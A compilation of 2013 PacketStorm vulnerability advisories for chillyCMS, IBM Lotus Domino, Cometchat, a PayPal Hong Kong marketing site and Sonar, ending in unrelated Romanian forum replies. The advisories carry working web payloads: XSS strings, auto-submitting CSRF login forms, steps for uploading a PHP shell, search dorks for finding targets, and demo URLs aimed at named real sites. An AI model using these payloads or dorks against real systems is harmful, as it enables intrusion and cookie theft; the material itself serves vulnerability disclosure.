chillyCMS version 1.3.0 suffers from URL restriction bypass and remote shell upload vulnerabilities. # Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities # Google Dork: "powered by chillyCMS" # Date: 15 February 2013 # Exploit Author: Abhi M Balakrishnan # Vendor Homepage: http://chillycms.bplaced.net/ # Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip # Version: 1.3.0 # Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8 # Video: http://www.youtube.com/watch?v=6B3rND9S75g # Vulnerability Failure to Restrict URL Access chillyCMS uses 302 redirects to restrict access to the unautorized pages. # Exploit Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/ Step 2: Access http://localhost/chillyCMS/admin/ # Vulnerability Arbitrary File Upload chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory # Exploit Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip Step 2: Upload shell.zip Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php # History 11 March 2012 - Discovered vulnerability and exploit, contacted the vendor. 12 March 2012 - Vendor responds back, exchanges few mails. 15 November 2012 - Vendor discontinues further development. 15 February 2013 - Published the vulnerabilities and exploits to the public. # How to reproduce The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files. Source: PacketStorm

IBM Lotus Domino version 8.5.3 suffers from cross site request forgery, cross site scripting, and redirection vulnerabilities. Hello list! These are Cross-Site Request Forgery, Cross-Site Scripting and Redirector vulnerabilities in IBM Lotus Domino. At 30th of November IBM released the advisory concerning these vulnerabilities. CVE ID: CVE-2012-4842, CVE-2012-4844. SecurityVulns ID: 12789. IBM Security Bulletin for Open Redirect and Cross-Site Scripting vulnerabilities: http://www-01.ibm.com/support/docview.wss?uid=swg21608160 ------------------------- Affected products: ------------------------- Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 9.0 and IBM are still working on other vulnerabilities, about which I've informed them. Lotus Domino 9.0 should be released at 14.03.2013. Before release of new version all users of affected versions of IBM Lotus Domino are vulnerable to these attacks. And IBM didn't fix these holes in current 8.5.x series, only in new 9.0 series. At that they didn't offer any workaround or mitigation for these issues. But I'll offer such workaround (see bellow), which can be used before release of version 9.0 with fixes of these vulnerabilities. ---------- Details: ---------- Cross-Site Request Forgery (WASC-09): Lack of captcha in login form (http://site/names.nsf) can be used for different attacks - for CSRF-attack to login into account (remote login - to conduct attacks on vulnerabilities inside of account), for XSS attacks, for redirect, for Brute Force (which I described in other advisory) and other automated attacks. Which you can read about in the article "Attacks on unprotected login forms" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html). Examples of attacks on XSS and Redirector vulnerabilities with using of this CSRF vulnerability are provided bellow. Cross-Site Scripting (WASC-08): For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability). Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/names.nsf?Login" method="post"> <input type="hidden" name="Username" value="login"> <input type="hidden" name="Password" value="password"> <input type="hidden" name="RedirectTo" value="javascript:alert(document.cookie)"> </form> </body> Redirector (URL Redirector Abuse) (WASC-38): For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability). Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html <body onLoad="document.hack.submit()"> <form name="hack" action=http://site/names.nsf?Login method="post"> <input type="hidden" name="Username" value="login"> <input type="hidden" name="Password" value="password"> <input type="hidden" name="RedirectTo" value="http://websecurity.com.ua"> </form> </body> ----------------- Workaround: ----------------- My workaround for these vulnerabilities is the next: turn off html-form for login and use Basic Authentication instead. ------------ Timeline: ------------ Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html). - During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site. - During 16.05-20.05 I've wrote five advisories via contact form at IBM site. - At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products). - At 30.11.2012 IBM released their advisory (about Cross-Site Scripting and Redirector holes). - At 14.12.2012 I've informed SecurityVulns about it. - At 15.02.2013 I've disclosed these vulnerabilities at my site (http://websecurity.com.ua/5835/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: PacketStorm

Cometchat suffers from remote PHP code execution and cross site scripting vulnerabilities. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Cometchat chat Application All Version Multiple Vulnerabilities Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts App Homepage : http://www.cometchat.com Author(Pentester): B127Y Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) Jani Exploit id 1 (http://www.janissaries.org/exploits/1) ################################################################################## 1.)Code Execution P0C (modules/chatrooms/chatrooms.php) call_user_func call_user_func($_GET['action']); Can use all php functions and cometchat function without arguments Live Demo:http://static.cometchat.com/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo 2.)XSS P0C (plugins/handwrite/index.php) echo echo <<<EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>{$handwrite_language[0]}</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; text-align: center; } html { height: 100%; overflow: hidden; /* Hides scrollbar in IE */ } body { height: 100%; margin: 0; padding: 0; } #flashcontent { height: 100%; } </style> </style> </head> <body><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main"> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="handwriting.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="tid={$toId}" /> <param name="scale" value="exactFit" /> <embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object></body> </html> EOD; $toId = $_GET['id']; Live Demo:http://static.cometchat.com/cometchat/plugins/handwrite/index.php?id="><script>alert(document.cookie)</script> Source: PacketStorm

The www.paypal-marketing.com.hk site suffers from multiple cross site scripting vulnerabilities. --- Vulnerability # No- 1: +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php +Vulnerability Type: Cross Site Scripting (XSS) + Form Action : POST +POST Data Sent to Produce the Bug : token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1 --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting . And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here . +POST Parameters that cause XSS Vulnerability in this Page : company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2 +How to fix : -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack + Screenshot : Attached with this mail ---------------------------------------------------------------------------- Vulnerability No. # 2 : +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php +Vulnerability Type: Cross Site Scripting (XSS) + Form Action : POST +POST Data Sent to Produce the Bug : token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1 --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting . And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here . +POST Parameters that cause XSS Vulnerability in this Page : company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2 +How to fix : -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack + Screenshot : Attached with this mail Thanking You Mahadev Subedi Source: PacketStorm

Sonar version 3.4.1 suffers from a cross site scripting vulnerability. Sonar v.3.4.1 => XSS (CWE-79) + Vendor info http://www.sonarsource.com/ Dork : intext:"Powered by SonarSource" ========================================================= + Author: devilteam.pl + WWW: http://devilteam.pl/ ========================================================= XSS: http://foo.bar/dependencies/index?search="><script>alert(/devilteam.pl/ )</script> http://foo.bar/dashboard/index/41730?did=4&period=3"><script>alert(/ devilteam.pl/)</script> http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am p;author_login=&assignee_login="><script>alert(/devilteam.pl/ )</script>&false_positives=with out&sort=&asc=false&commit=Search http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am p;author_login="><script>alert(/devilteam.pl/ )</script>&assignee_login=&false_positives=with out&sort=&asc=false&commit=Search http://foo.bar/api/sources?resource=<script>alert(/devilteam.pl/ )</script>&format=txt demo: http://nemo.sonarXsource.org/dependencies/index?search="><script>alert(/ devilteam.pl/)</script> https://dev.eclipXse.org/sonar/dependencies/index?search="><script>alert(/ devilteam.pl/)</script> https://gcrcwin.cXacr.med.umich.edu/sonar/dependencies/index?search= "><script>alert(/devilteam.pl/)</sc ript> http://csci3601sp12.mXorris.umn.edu:2020/sonar/dependencies/index?search= "><script>alert(/devilteam.pl/)&l t;/script> https://redbox-build.cqXu.edu.au/sonar/dependencies/index?search= "><script>alert(/devilteam.pl/)</scrip t> greetz: cxsec.org Source: http://cxsecurity.com/blad/WLB-2013020088 Source: PacketStorm

1.Eu stiam ca se pune si link catre target vulnerable. 2.Specifica metoda. 3.Nu mai posta ch. easy doar din dragul de a face posturi. 4.De ce atatea cerinte? Ce importanta ar avea hostname, datadir, basedir? 6.Ce rol are datadir? Dar basedir? 7.De ce esti rasist? //Edit: PM Sent.

Da, e buna metoda cand ai nevoie de a selecta fiecare coloana.

E down. The connection has timed out